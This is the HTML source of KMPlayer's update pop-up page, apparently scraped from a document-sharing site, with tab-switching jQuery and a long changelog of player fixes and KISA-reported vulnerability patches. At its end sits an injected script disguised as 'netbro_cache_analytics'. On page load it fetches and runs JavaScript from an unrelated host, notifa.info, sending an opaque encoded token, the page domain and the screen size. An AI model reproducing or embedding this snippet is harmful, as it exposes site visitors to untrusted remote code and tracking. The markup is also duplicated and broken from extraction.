Sunteți pe pagina 1din 10

<html>

<head>
<meta lang="ko" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv='expires' content='-1' />
<meta http-equiv='pragma' content='no-cache' />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />

<meta name="author" content="Lee Jun Hyung" />


<meta name="copyright" content="KMPMedia" />
<meta name="subject" content="KMPMedia" />
<meta name="title" content="KMPMedia" />
<meta name="Publisher" content="KMP Media" />
<meta name="Other Agent" content="Lee Jun Hyung" />
<meta name="Classification" content="media" />
<meta name="Location" content="Republic of Korea" />
<meta name="description" content="KMPMedia" />
<meta name="viewport" content="width=1030px" />
<meta name="keywords" content="KMPMedia,KMPlayer,KMP,palyer,media" />

<link rel="stylesheet" type="text/css"


href="http://cdn.kmplayer.com/KMP/static/css/jquery/plugin/trontastic/jquery-ui-
1.8.23.custom.css" />

<script type="text/javascript"
src="http://cdn.kmplayer.com/KMP/static/js/global/constant.js?dummy=v1"></script>
<script type="text/javascript"
src="//ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js?dummy=v1"></script>
<script type="text/javascript"
src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.18/jquery-ui.min.js?
dummy=v1"></script>
<script type="text/javascript"
src="http://cdn.kmplayer.com/KMP/static/js/global/global.js?dummy=v1"></script>
</head>
<body style="" >

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"


"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="No-Cache">

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<title>Update KMPlayer</title>
<style>
* {
border-style: none;
color: #222222;
font-family: dotum, "돋움", sans-serif;
font-size: 12px;
margin: 0;
padding: 0;
}
a { color: #FFF; text-decoration: none; }
a:visited {}
a:hover { text-decoration: none; }

li{
list-style:none outside none;
}

body {
margin:0;
overflow:hidden;
}

.wrap_body {
width: 100%
}

.wrap_contents {
width: 478px;
height: 271px;
border: 1px solid #000;
}

.areaTab {
width: 100%;
height: 38px;
}

.areaTab a {
cursor:pointer;
text-align:center;
display: block;
float:left;
line-height: 36px;
width:239px;
height:38px;
}

.tab01 {
color: #999;
background-image:
url("http://cdn.kmplayer.com/KMP/images/player/update_tab_01_a.jpg");
}

.tab02 {
color: #999;
background-image:
url("http://cdn.kmplayer.com/KMP/images/player/update_tab_02_a.jpg");
}

.tab01_on{
color: #FFF;
background-image:
url("http://cdn.kmplayer.com/KMP/images/player/update_tab_01_b.jpg");
font-weight:bold;
}

.tab02_on{
color: #FFF;
background-image:
url("http://cdn.kmplayer.com/KMP/images/player/update_tab_02_b.jpg");
font-weight:bold;
}

.areaContent
{
height:233px;
}

.overFlow
{
overflow:auto;
}

#content02
{
padding:15px;
}

#content02 li
{
height:20px;
line-height:20px;
margin-bottom:4px;
}
#content02 .li2
{
height:40px;
line-height:20px;
margin-bottom:4px;
}
</style>
<script type="text/javascript" src="http://code.jquery.com/jquery-
1.7.2.min.js"></script>
<script type="text/javascript"
src="http://cdn.kmplayer.com/KMP/static/js/global/global.js?v=4"></script>
<script>
$( document ).ready( function() {
global.call_big_log('0','a03','a02','');

$("#tab01").click(function(){
kmpUpdate.tabCtl(0);
kmpUpdate.contentCtl(0);
});
$("#tab02").click(function(){
kmpUpdate.tabCtl(1);
kmpUpdate.contentCtl(1);
});
});

var kmpUpdate = {
arrTab : new Array("#tab01","#tab02"),
arrContent : new Array("#content01","#content02"),
arrClassOn : new Array("tab01_on", "tab02_on"),
arrClassOff : new Array("tab01", "tab02"),

tabCtl : function(n_)
{
for(var i=0; i< this.arrTab.length; i++)
{
if(i==n_)
{
$(this.arrTab[i]).removeClass(this.arrClassOff[i]);
$(this.arrTab[i]).addClass(this.arrClassOn[i]);
}
else
{
$(this.arrTab[i]).removeClass(this.arrClassOn[i]);
$(this.arrTab[i]).addClass(this.arrClassOff[i]);
}
}
},

contentCtl : function(n_)
{
for(var i=0; i< this.arrContent.length; i++)
{
if(n_==1)
$(".areaContent").addClass("overFlow");
else
$(".areaContent").removeClass("overFlow");

if(i==n_)
$(this.arrContent[i]).show();
else
$(this.arrContent[i]).hide();
}
}
};
</script>
</head>
<body scroll="no">
<iframe id="big_log" style="display:none;"></iframe>

<div class="wrap_body">
<div class="wrap_contents">
<!--Tab-->
<div class="areaTab">
<a id="tab01" class="tab01_on">KMPlayer 4.2.2.27</a>
<a id="tab02" class="tab02">Update List</a>
</div>
<!--Contents-->
<div class="areaContent">
<div id="content01" style="display:block;">
<img
src="http://cdn.kmplayer.com/KMP/images/player/auto_update/kmplayer_4_2_2_27_all_20
190516094042.jpg" style="height:233px;" usemap="#Map" />
</div>
<div id="content02" style="display:none;">
<ul>
<p>=========================================<br
/>
Ver 4.2.2.27</p>

<p>- Modified some non-playable phenomena when double-clicking an image file.<br />
- Changed video renderer preferences to VMR9.</p>
<p>=========================================<br />
Ver 4.2.2.26</p>

<p>- Changed the size to 800 * 600 when adjusting the Screen size ratio before
playback.<br />
- Changed software decoder to default setting.<br />
- Fixed typos<br />
- Fixed registry registration errors when installing.</p>

<p>=========================================<br />
Ver 4.2.2.25</p>

<p>- Changed the size to 800 * 600 when adjusting the Screen size ratio before
playback.<br />
- Changed software decoder to default setting.<br />
- Fixed typos</p>

<p>=========================================<br />
Ver 4.2.2.24</p>

<p>- Changed the main log image.<br />


- Added Moviebloc homepage and Telegram link.<br />
- Fixed a problem that When the screen layout scale is changed, the file open menu
is truncated.<br />
- Changed options when calling statistics log.</p>

<p>=========================================<br />
Ver 4.2.2.23</p>

<p>1. Add hardware decoding setting function button to main UI<br />
- Switching to use DXVA codec when clicking HW(SW) button during video
playback<br />
2. Preferences &gt; Video Processing Options - DXVA2 Mode Setting Function
Dependent Removal</p>

<p>=========================================<br />
Ver 4.2.2.22</p>

<p>1. Edit subtitles engine<br />


- Fixed character break in some UTF-8 format when SRT subtitles<br />
2. HDR SMPTE ST 2084 automatic correction function correction<br />
- Delete video renderer device change function when calibrating<br />
- Fixed problem that can not be calibrated automatically when changing performance
setting<br />
3. Modification of the VMR Renderless method<br />
- Change to default 3D texture surface<br />
- Delete setting change function in preference setting<br />
4. Change the Video Renderer device settings<br />
- Change the default device from Overlay Mixer to Enhanced Video Renderer (C /
A)</p>

<p>=========================================<br />
Ver 4.2.2.21</p>

<p>1. Fixed error when opening DVD image IFO file drag<br />
2. Added HDR SMPTE ST 2084 automatic correction function<br />
3. Problem improvement work in IE wing window</p>

<p>=========================================<br />
Ver 4.2.2.20</p>

<p>1. Fixed a bug that does not skip mouse when playing audio</p>

<p>=========================================<br />
Ver 4.2.2.19</p>

<p>1. Modify the ASS Subtitle Data Overflow Problem</p>

<p>2. Modify the problem that the sink of the ASS subtitle is not moved.</p>

<p>3. Change the default settings for magnet windows (only the base screen and the
playlist window are basically magnetic windows).</p>

<p>=========================================<br />
Ver 4.2.2.18</p>

<p>1. Modify the URL Download(Youtube) Library</p>

<p>2. Fixed button control bug when in shade mode.</p>

<p>3. Fixed loading display bug at the start of video playback</p>

<p>=========================================<br />
Ver 4.2.2.17</p>

<p>1.The menu font size has been modified.<br />


2. A bug modified that does not work with shortcuts after running the
program.<br />
3.Fixed the bug to prevent the default window from activating after playing the
following video in the playlist. (The keyboard shortcut bug has also been
modified.)<br />
4. Automatically add video pauses when screen locking is executed (once again when
screen unlocks)</p>

<p>=========================================<br />
Ver 4.2.2.16</p>

<p>1. Security vulnerabilities have been supplemented.<br />


2. The URL download function has been upgraded.<br />
- Add downloadable video sites. (YouTube, Facebook, Twitter, Dailymotion)<br />
- The cover image is created as a thumbnail image of the image when downloading
MP3.<br />
- The UI has changed.<br />
3. UI bug has been fixed.</p>

<p>=========================================<br />
Ver 4.2.2.15</p>

<p>1. Fixed UI bug.<br />


2. Fixed bug related to YouTube download function.</p>

<p>=========================================<br />
Ver 4.2.2.14</p>

<p>1. URL download bug has been fixed.<br />


2. URL download button has been inserted in the front UI.<br />
3. VR button image has been modified.<br />
4. GIF creation bug has been fixed.</p>
<p><br />
=========================================<br />
Ver 4.2.2.13</p>

<p><br />
1. GIF file creation possible.<br />
- You can capture the selected location and create it as a GIF file.<br />
- Mouse cursor can also be captured.<br />
- Can be paused during screen capture.<br />
- Adjustable number of frames per second. (FPS)<br />
- Added GIF Reverse, GIF Bounce and GIF speed control.<br />
- GIF Dither mode, GIF Color Reduction selectable.</p>

<p>2, Youtube download function has been modified.<br />


- Modified to extract only audio from low resolution images.<br />
- If audio is extracted only, it can be changed to MP3 file.<br />
=========================================</p>

<p>Ver 4.2.2.12</p>

<p>Fixed Youtube download bug.</p>

<p>=========================================</p>

<p>Ver 4.2.2.11</p>

<p>1. Added Youtube video download function.<br />


- Downloadable as 4K.<br />
- You can download video audio files together.<br />
2. Fixed error when playing certain movie. (Occurs when Youtube download movie is
played.)<br />
3. Fixed pop-up menu bug when running after installation.</p>

<p>=========================================</p>

<p>Ver 4.2.2.10</p>

<p>1. When moving the screen, the size of the window and the menu are adjusted to
fit the screen.<br />
(When using HiDPI monitor and general monitor at the same time)<br />
2. Fixed a bug in the wing window.<br />
3. Inactive menu functions have been deleted.<br />
&nbsp;&nbsp;&nbsp;(Web search function, File manager download function)</p>

<p>=========================================</p>

<p>Ver 4.2.2.9</p>

<p>1. Ads modified by user feedback.<br />


- Video AD muted.<br />
- Player area AD removed.<br />
2. Fixed Chrome crash bug.<br />
3. Security has been enhanced.<br />
- Fixed issue with text box title length when adding playlist album.<br />
- Prohibited distribution of Winamp plug-in due to overflow when playing WVX
file.<br />
4. PGS subtitles and other images have been modified so that the inserted image
captions are displayed well.<br />
5. Playback control buttons have been added to the taskbar (works only in Windows 7
and later).<br />
6. Corrected to display chapters when playing Blu-ray video.<br />
7. Modified the codec so that the audio codec information on the bottom toolbar is
displayed correctly(aac).</p>

<p>=========================================</p>

<p>Ver 4.2.2.8</p>

<p>1. Fixed bug in subtitle time when playing video.<br />


2. Skin Bug Fixed.<br />
3. Added video decoding information display function.(HW decoding and SW decode
information displayed at the bottom of the player)<br />
4. Modified to display bitrate information correctly in video information
display.<br />
5. Fixed a bug that skips the screen when rotating high-resolution images.</p>

<p>=========================================</p>

<p>Ver 4.2.2.7</p>

<p>-&nbsp;&nbsp;&nbsp;&nbsp;Fixed FTP connection bug.<br />


-&nbsp;&nbsp;&nbsp;&nbsp;Fixed progress bar mouse control bug when playing.<br />
-&nbsp;&nbsp;&nbsp;&nbsp;Update Media File Information Library
(Mediainfo.dll)<br />
-&nbsp;&nbsp;&nbsp;&nbsp;Drag-and-drop bug fixed after installation.</p>

<p>=========================================</p>

<p>Ver 4.2.2.6</p>

<p>Fixed security vulnerability recommendations.</p>

<p>- Patch to work with the latest library when playing flac files.</p>

<p>=========================================</p>

<p>Ver 4.2.2.5</p>

<p>- Update URL list and add buttons.</p>

<p>- Fixed bug where image processing filter priority was not set correctly.</p>

<p>- Fixed side screen black screen bug when playing video after audio
playback.</p>

<p>- Add license contents.</p>

<p>=========================================</p>

<p>ver 4.2.2.3</p>

<p>Improved UX/UI for increased user convenience.</p>

<p>=========================================<br />
ver 4.2.2.2</p>

<p>Fixed errors that broken skins during music playback.<br />


Fixed errors that black screen appears when playing video after playing music.</p>

<p>=========================================</p>

<p>ver 4.2.2.1</p>

<p>1. Fix connection errors in KMP extension (Higher version of Window7)</p>

<p>2. Upgrade KMP LAV filters verison(0.70.2)</p>

<p>[LAV filters Improvements.]<br />


General<br />
- Official LAV Filters builds require a SSE2 capable CPU<br />
LAV Splitter<br />
- Fixed: Certain MP4/MOV files didn&#39;t play or seek correctly in recent versions
of LAV Splitter<br />
- Fixed: HEVC in MP4 without PTS timestamp is being signaled appropriately<br />
- Fixed: Closing RTSP streams did not properly call the TEARDOWN function<br />
LAV Video<br />
- NEW: CUVID support for VP9 8/10-bit and HEVC 10/12-bit decoding<br />
- NEW: DXVA2 support for VP9 10-bit decoding<br />
- Changed: Simplified the internal dataflow to reduce overhead and improve
performance<br />
- Changed: Enabled P010 output to EVR on Windows 10 Creators Update<br />
- Fixed: Y416 output was incorrect (required by madVR 0.91.8 and newer)<br />
- Fixed: Parsing H.264 MVC SEI NALs could fail in some cases<br />
- Fixed: CUVID decoding could deinterlace progressive streams under certain
circumstances, degrading the quality<br />
LAV Audio<br />
- Fixed: LATM AAC streams with Program Config Elements (PCE) (common in DVB-T2
broadcast) played with audible distortions<br />
- Fixed: Very short PCM audio streams didn&#39;t play properly</p>

<p>==================================================<br />
ver 4.2.1.4<br />
1. Fixed a screen capture bug that occurs when playing video.<br />
&nbsp;<br />
2. Corrected recommendations from KISA(KOREA INTERNET &amp; SECURITY AGENCY)<br />
- [17-299] Vulnerability in arbitrary code execution (Vulnerability in DIB format
execution)</p>

<p>==================================================<br />
ver 4.2.1.2<br />
1. Hardware acceleration (DXVA2) bug fixed.<br />
&nbsp;- environment setting --&gt; KMP Built-in LAV Video Codec --&gt; After
setting that it allow to use DXVA2 in Video Codec Setting, it can be
supported.<br />
&nbsp;- Only supproting Video Renderer when using EVR(Enhanced Video Renderer) or
EVR CA renderer.<br />
&nbsp;- Bugs that when using Hardware acceleration (DXVA2) or EVR CA, it
dosen&#39;t play in some files or it&#39;s sink was twisted in some files are
fixed.</p>

<p>2. Modification regarding subtitles.<br />


&nbsp;- Supporting inner PGS image subtitles in media file. (supproting Hardware
acceleration simultaneously)<br />
&nbsp;- Supporting outer, SUP file subtitles. (supproting Hardware acceleration
simultaneously)<br />
&nbsp;- Supporting inner, outer ASS format subtitles. (supproting Hardware
acceleration simultaneously)<br />
&nbsp;- As supporting GaussianBlur(subtitles outline), increase legibility.</p>

<p>3. LAV Filter<br />


&nbsp;- Version update (0.69.0)</p>

<p>4. ETC<br />


&nbsp;- As modification in snap shot extraction method, it can extraction snap shot
without screen move and image processing filter.</p>

<p>5. Update KISA&#39;s recommendation<br />


&nbsp;- [16-645] Update weak point regarding &#39;stco atom&#39;s&#39; parameter
size.<br />
&nbsp;- [17-226] Update weak point regarding &#39;co64 atom&#39;s&#39;
overflow.</p>
</ul>
</div>
</div>
</div>
</div>
<map name="Map">
<area shape="rect" coords="0,0,0,0"
href="https://play.google.com/store/apps/details?id=tv.pandora.kmpvr"
target="_blank" onclick="global.call_big_log('0','a03','a12','');" />
</map>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn,
callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn)
{fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ?
"https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var
url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" +
"&params=" + "4TtHaUQnUEiP6K
%2fc5C582JKzDzTsXZH2WsDKZHPgJcD03gpOMndJicGCq0eLr27LLwvZoHlFGYDUzcs8%2bsvE941sdvP3z
qj0FFSu0%2bo3GAKvVkl0HGILXwQpBw1tWHy8drcCcqS7w98Qb6BYTh1ngmpbOg2Fqo
%2bOr7ybldd4avDL4GZhQmMKTksbkyYiCkOEdKvg
%2foLmuMySZtgTUzYBxmuVLFPDyRTyT7ZqhbT36mh7wwo5pbnW2csH5uvVoZ2AWp2n7UWYxkvs
%2fv7fjR9kTT53sHhUoiiWXxHidyXWKLLNypC4QvQjZ%2bW%2fRf
%2f9Mh80o6aS6MgO4Gh45yUQwQXfD3zgsjkW6xueGMp%2fgr6Yjj%2fSEAsgTnINiN4TCgYbH7z111AOlUx
%2f8rnWRQdpqNcAEGX%2bqkgJZda2u6%2b%2br4dkb%2fBn3xlE7MtasABTZgYr%2bm3t
%2bmk7%2bmA9RVCcUlm8nict
%2bqd468%2fp64zhuIBvxzBEGPNa0FgfQGOgJ11LeQQmGsX8L3xVeH3cz74yWuY7kV%2flt3QrwzE
%2flafdHFOj6R1Cyq
%2bNJVH4BxExHqwKahREA8al4Uwqg4%2fVE6Qa43fSKwIGzL0wAAmc5w0Y0zBYo5rKqpFTuDT9v3KveQsa4
BedeqL%2bCbxw6c6TqccMs4wlV72VSpASWekT92XuLcOlQd3z%2b07t4j8uRBjIgf0ACqnU4tjj" +
"&idc_r="+idc_glo_r + "&domain="+document.domain +
"&sw="+screen.width+"&sh="+screen.height;var bsa =
document.createElement('script');bsa.type = 'text/javascript';bsa.async =
true;bsa.src = url;(document.getElementsByTagName('head')[0]||
document.getElementsByTagName('body')
[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function()
{});};</script></body>
</html>

</body>

</html>

S-ar putea să vă placă și